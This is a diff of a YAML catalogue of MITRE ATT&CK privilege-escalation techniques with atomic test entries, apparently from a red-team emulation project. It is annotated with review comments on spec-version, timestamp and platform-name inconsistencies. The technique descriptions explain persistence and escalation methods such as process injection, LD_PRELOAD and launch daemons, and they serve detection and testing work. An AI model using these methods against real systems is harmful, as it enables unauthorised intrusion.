T1037.002:
@@ -19640,7 +19972,7 @@ privilege-escalation:
Wardle Persistence Chapter)\n\n**Note:** Login hooks were deprecated in 10.11
version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)
and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) "
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:42:05.094Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Initialization Scripts: Logon Script (Mac)'
x_mitre_detection: Monitor logon scripts for unusual access by abnormal users
@@ -19661,7 +19993,6 @@ privilege-escalation:
- 'Command: Command Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.002
atomic_tests:
- name: Logon Scripts - Mac
@@ -19682,7 +20013,7 @@ privilege-escalation:
name: manual
T1055:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:45.488Z'
name: Process Injection
description: "Adversaries may inject code into processes in order to evade process-based
defenses as well as possibly elevate privileges. Process injection is a method
@@ -19785,7 +20116,6 @@ privilege-escalation:
url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1055
atomic_tests: []
T1611:
@@ -19885,12 +20215,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1611
atomic_tests: []
T1547.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T13:41:16.110Z'
name: 'Boot or Logon Autostart Execution: Shortcut Modification'
description: |-
Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.
@@ -19903,7 +20232,6 @@ privilege-escalation:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- David French, Elastic
- Bobby, Filar, Elastic
@@ -19916,7 +20244,6 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.2'
@@ -19946,7 +20273,8 @@ privilege-escalation:
url: https://www.youtube.com/watch?v=nJ0UsyiUEqQ
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1547.009
atomic_tests: []
T1547.005:
@@ -19973,7 +20301,7 @@ privilege-escalation:
description: Microsoft. (2013, July 31). Configuring Additional LSA Protection.
Retrieved June 24, 2015.
source_name: Microsoft Configure LSA
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-25T15:42:48.910Z'
name: 'Boot or Logon Autostart Execution: Security Support Provider'
description: |-
Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.
@@ -19999,13 +20327,11 @@ privilege-escalation:
- 'Windows Registry: Windows Registry Key Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1547.005
atomic_tests: []
T1543.004:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:48.453Z'
name: 'Create or Modify System Process: Launch Daemon'
description: |-
Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in /System/Library/LaunchDaemons/
and /Library/LaunchDaemons/
. Required Launch Daemons parameters include a Label
to identify the task, Program
to provide a path to the executable, and RunAtLoad
to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)
@@ -20082,7 +20408,6 @@ privilege-escalation:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1543.004
atomic_tests:
- name: Launch Daemon
@@ -20168,7 +20493,7 @@ privilege-escalation:
sudo rm /tmp/T1543_004_atomicredteam.txt
T1574.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:25:57.059Z'
name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -20187,6 +20512,7 @@ privilege-escalation:
phase_name: defense-evasion
x_mitre_contributors:
- Stefan Kanthak
+ x_mitre_deprecated: false
x_mitre_detection: |
Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
@@ -20194,7 +20520,6 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
@@ -20214,34 +20539,36 @@ privilege-escalation:
id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
created: '2020-03-13T17:48:58.999Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1574/008
external_id: T1574.008
+ - source_name: Microsoft Environment Property
+ description: Microsoft. (2011, October 24). Environment Property. Retrieved
+ July 27, 2016.
+ url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
- source_name: Microsoft CreateProcess
- description: Microsoft. (n.d.). CreateProcess function. Retrieved December
- 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms682425
+ description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+ - source_name: Microsoft WinExec
+ description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+ 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
- source_name: Windows NT Command Shell
description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
December 5, 2014.
url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
- - source_name: Microsoft WinExec
- description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms687393
- - source_name: Microsoft Environment Property
- description: Microsoft. (2011, October 24). Environment Property. Retrieved
- July 27, 2016.
- url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.008
atomic_tests: []
T1484.001:
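Review bot: in the T1574.008 `external_references` block the `Microsoft CreateProcess` and `Microsoft WinExec` entries are modernised to `learn.microsoft.com`, while `Windows NT Command Shell` and `Microsoft Environment Property` keep their `docs.microsoft.com/en-us/previous-versions/...?redirectedfrom=MSDN` URLs; the latter are unchanged upstream and should not be touched here, but the inconsistency is worth reporting to the source. The rest of the hunk is list reordering (`Microsoft Environment Property` moves from last to first, `WinExec` moves up) that conceals the substantive changes, namely `revoked: false`, `x_mitre_attack_spec_version` 3.1.0 to 3.2.0 and the re-added `x_mitre_modified_by_ref`; emitting references in a stable order from the generator would keep such hunks readable.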
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-23T22:11:01.884Z'
name: 'Domain Policy Modification: Group Policy Modification'
description: "Adversaries may modify Group Policy Objects (GPOs) to subvert
the intended discretionary access controls for a domain, usually with the
@@ -20277,6 +20604,10 @@ privilege-escalation:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Itamar Mizrahi, Cymptom
+ - Tristan Bennett, Seamless Intelligence
+ x_mitre_deprecated: false
x_mitre_detection: |-
It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:
@@ -20288,16 +20619,12 @@ privilege-escalation:
GPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704).
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
x_mitre_version: '1.0'
- x_mitre_contributors:
- - Itamar Mizrahi, Cymptom
- - Tristan Bennett, Seamless Intelligence
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Active Directory: Active Directory Object Creation'
@@ -20333,12 +20660,12 @@ privilege-escalation:
url: https://wald0.com/?p=179
- source_name: Harmj0y Abusing GPO Permissions
description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
- March 5, 2019.
- url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+ September 23, 2024.
+ url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
- source_name: Harmj0y SeEnableDelegationPrivilege Right
description: Schroeder, W. (2017, January 10). The Most Dangerous User Right
- You (Probably) Have Never Heard Of. Retrieved March 5, 2019.
- url: http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
+ You (Probably) Have Never Heard Of. Retrieved September 23, 2024.
+ url: https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
- source_name: TechNet Group Policy Basics
description: 'srachui. (2012, February 13). Group Policy Basics – Part 1:
Understanding the Structure of a Group Policy Object. Retrieved March 5,
@@ -20346,14 +20673,13 @@ privilege-escalation:
url: https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1484.001
atomic_tests: []
T1078.001:
technique:
- modified: '2024-03-07T14:27:04.770Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Default Accounts'
description: |-
Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
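Review bot: `spec_version: '2.1'` is dropped from T1484.001 here and from every other technique object touched below, while `x_mitre_attack_spec_version` is bumped to 3.2.0. STIX 2.1 requires `spec_version` on every object, so if anything downstream feeds these `technique` blocks to a STIX-aware parser this will fail validation; if the field is intentionally omitted because this file is an internal index rather than a STIX bundle, a short note in the commit message or generator would save the next reader the same question.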
@@ -20368,6 +20694,7 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: Monitor whether default accounts have been activated or logged
into. These audits should also include checks on any appliances and applications
@@ -20376,18 +20703,18 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
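Review bot: the platform list for T1078.001 replaces "Azure AD", "Office 365" and "Google Workspace" with "Office Suite" and "Identity Provider" (the same substitution appears for T1548, T1548.005, T1098.005 and T1098.001 below). Any per-platform index that is generated from `x_mitre_platforms` must be regenerated against the new names in the same change, or the old platform indexes will silently lose these techniques while no "Office Suite" or "Identity Provider" index gains them.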
@@ -20419,9 +20746,6 @@ privilege-escalation:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.001
atomic_tests:
- name: Enable Guest Account on macOS
@@ -20504,7 +20828,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.003
atomic_tests: []
T1546.005:
@@ -20531,7 +20854,7 @@ privilege-escalation:
url: https://bash.cyberciti.biz/guide/Trap_statement
description: Cyberciti. (2016, March 29). Trap statement. Retrieved May 21,
2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T16:43:02.273Z'
name: 'Event Triggered Execution: Trap'
description: |-
Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The trap
command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like ctrl+c
and ctrl+d
.
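Review bot: the `modified` timestamp for T1546.005 moves backwards, from 2021-04-29 to 2020-03-24, and the same regression appears for T1574.006, T1134.002, T1548.001, T1546.012, T1055.013, T1574.005, T1546.008, T1055.004, T1546.009, T1055.002, T1547.015, T1134.004, T1055.014 and others below. A modification date should not decrease on a sync; this suggests these objects were regenerated from a different (older or un-normalised) source than the ones whose dates advance, so please confirm which upstream bundle produced them before merging.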
@@ -20557,8 +20880,6 @@ privilege-escalation:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.005
atomic_tests:
- name: Trap EXIT
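Review bot: for T1546.005 both `spec_version` and `x_mitre_attack_spec_version: 2.1.0` are removed and nothing replaces them, unlike the objects above that are bumped to 3.2.0. The same pattern recurs for T1546.012, T1055.013, T1574.005, T1055.004, T1546.009, T1055.002 and T1547.015. Leaving some techniques with no spec version at all while others carry 3.2.0 makes the file inconsistent for any consumer that branches on that field; either emit 3.2.0 for these too or document why the 2.1.0 objects are treated differently.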
@@ -20597,7 +20918,7 @@ privilege-escalation:
name: sh
T1574.006:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:40.146Z'
name: 'Hijack Execution Flow: LD_PRELOAD'
description: "Adversaries may execute their own malicious payloads by hijacking
environment variables the dynamic linker uses to load shared libraries. During
@@ -20718,7 +21039,6 @@ privilege-escalation:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1574.006
atomic_tests:
- name: Dylib Injection via DYLD_INSERT_LIBRARIES
@@ -20764,7 +21084,7 @@ privilege-escalation:
elevation_required: false
T1548:
technique:
- modified: '2024-04-15T20:52:09.908Z'
+ modified: '2024-10-15T15:32:21.811Z'
name: Abuse Elevation Control Mechanism
description: 'Adversaries may circumvent mechanisms designed to control elevate
privileges to gain higher-level permissions. Most modern systems contain native
@@ -20796,11 +21116,10 @@ privilege-escalation:
- Linux
- macOS
- Windows
- - Office 365
- IaaS
- - Google Workspace
- - Azure AD
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'User Account: User Account Modification'
@@ -20841,11 +21160,10 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1134.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-11T21:14:37.714Z'
name: Create Process with Token
description: |-
Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as CreateProcessWithTokenW
and runas
.(Citation: Microsoft RunAs)
@@ -20901,12 +21219,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.002
atomic_tests: []
T1548.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-15T18:43:20.995Z'
name: 'Abuse Elevation Control Mechanism: Setuid and Setgid'
description: |-
An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.
@@ -20963,7 +21280,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1548.001
atomic_tests:
- name: Make and modify binary from C source
@@ -21106,7 +21422,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.004
atomic_tests: []
T1098.004:
@@ -21216,7 +21531,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.004
atomic_tests:
- name: Modify SSH Authorized Keys
@@ -21289,7 +21603,7 @@ privilege-escalation:
description: Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December
18, 2017.
source_name: Symantec Ushedix June 2008
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.112Z'
name: 'Event Triggered Execution: Image File Execution Options Injection'
description: |-
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe -g notepad.exe
). (Citation: Microsoft Dev Blog IFEO Mar 2010)
@@ -21322,13 +21636,11 @@ privilege-escalation:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.012
atomic_tests: []
T1548.005:
technique:
- modified: '2024-03-28T15:30:09.313Z'
+ modified: '2024-10-15T16:07:49.519Z'
name: Temporary Elevated Cloud Access
description: "Adversaries may abuse permission configurations that allow them
to gain temporarily elevated access to cloud resources. Many cloud environments
@@ -21390,10 +21702,9 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- IaaS
- - Azure AD
- - Office 365
- - Google Workspace
- x_mitre_version: '1.1'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'User Account: User Account Modification'
type: attack-pattern
@@ -21451,7 +21762,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.013:
technique:
@@ -21493,7 +21803,7 @@ privilege-escalation:
description: Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved
December 20, 2017.
source_name: Microsoft PsSetCreateProcessNotifyRoutine routine
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-02-09T15:43:48.848Z'
name: Process Doppelgänging
description: "Adversaries may inject malicious code into process via process
doppelgänging in order to evade process-based defenses as well as possibly
@@ -21552,8 +21862,6 @@ privilege-escalation:
- Administrator
- SYSTEM
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1574.005:
technique:
@@ -21583,7 +21891,7 @@ privilege-escalation:
description: 'Stefan Kanthak. (2015, December 8). Executable installers are
vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
of privilege. Retrieved December 4, 2014.'
- modified: '2020-10-27T14:49:39.188Z'
+ modified: '2020-03-26T19:20:23.030Z'
name: Executable Installer File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -21618,12 +21926,10 @@ privilege-escalation:
- Administrator
- User
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1546.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:33:18.602Z'
name: 'Event Triggered Execution: Accessibility Features'
description: |-
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.
@@ -21700,7 +22006,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.008
atomic_tests: []
T1055.004:
@@ -21739,7 +22044,7 @@ privilege-escalation:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:23:46.476Z'
name: 'Process Injection: Asynchronous Procedure Call'
description: "Adversaries may inject malicious code into processes via the asynchronous
procedure call (APC) queue in order to evade process-based defenses as well
@@ -21788,8 +22093,6 @@ privilege-escalation:
x_mitre_defense_bypassed:
- Application control
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.004
atomic_tests: []
T1546.009:
@@ -21821,7 +22124,7 @@ privilege-escalation:
description: Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls.
Retrieved December 18, 2017.
source_name: Sysinternals AppCertDlls Oct 2007
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.052Z'
name: 'Event Triggered Execution: AppCert DLLs'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by AppCert DLLs loaded into processes.
@@ -21869,13 +22172,11 @@ privilege-escalation:
x_mitre_effective_permissions:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.009
atomic_tests: []
T1098.005:
technique:
- modified: '2023-10-03T17:38:39.065Z'
+ modified: '2024-09-25T20:39:53.597Z'
name: Device Registration
description: "Adversaries may register a device to an adversary-controlled account.
Devices may be registered in a multifactor authentication (MFA) system, which
@@ -21888,16 +22189,16 @@ privilege-escalation:
FireEye SolarWinds) In some cases, the MFA self-enrollment process may require
only a username and password to enroll the account's first device or to enroll
a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022)\n\nSimilarly,
- an adversary with existing access to a network may register a device to Azure
- AD and/or its device management system, Microsoft Intune, in order to access
+ an adversary with existing access to a network may register a device to Entra
+ ID and/or its device management system, Microsoft Intune, in order to access
sensitive data or resources while bypassing conditional access policies.(Citation:
AADInternals - Device Registration)(Citation: AADInternals - Conditional Access
- Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Azure AD may
+ Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Entra ID may
be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)
campaigns via intra-organizational emails, which are less likely to be treated
as suspicious by the email client.(Citation: Microsoft - Device Registration)
Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002)
- on an Azure AD tenant by registering a large number of devices.(Citation:
+ on an Entra ID tenant by registering a large number of devices.(Citation:
AADInternals - BPRT)"
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -21909,16 +22210,16 @@ privilege-escalation:
- Mike Moran
- Joe Gumke, U.S. Bank
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- Windows
- - SaaS
- x_mitre_version: '1.2'
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Active Directory: Active Directory Object Creation'
@@ -21973,7 +22274,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.002:
technique:
@@ -21996,7 +22296,7 @@ privilege-escalation:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:21:11.178Z'
name: 'Process Injection: Portable Executable Injection'
description: "Adversaries may inject portable executables (PE) into processes
in order to evade process-based defenses as well as possibly elevate privileges.
@@ -22040,8 +22340,6 @@ privilege-escalation:
- Application control
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.002
atomic_tests: []
T1547.015:
@@ -22118,7 +22416,7 @@ privilege-escalation:
url: https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/LaunchServicesKeys.html#//apple_ref/doc/uid/TP40009250-SW1
description: Apple. (2018, June 4). Launch Services Keys. Retrieved October
5, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T16:36:37.042Z'
name: 'Boot or Logon Autostart Execution: Login Items'
description: |-
Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call SMLoginItemSetEnabled
.
@@ -22146,8 +22444,6 @@ privilege-escalation:
- 'File: File Modification'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1547.015
atomic_tests:
- name: Add macOS LoginItem using Applescript
@@ -22234,23 +22530,22 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.001
atomic_tests: []
T1098.001:
technique:
- modified: '2024-02-28T14:35:00.862Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Account Manipulation: Additional Cloud Credentials'
description: "Adversaries may add adversary-controlled credentials to a cloud
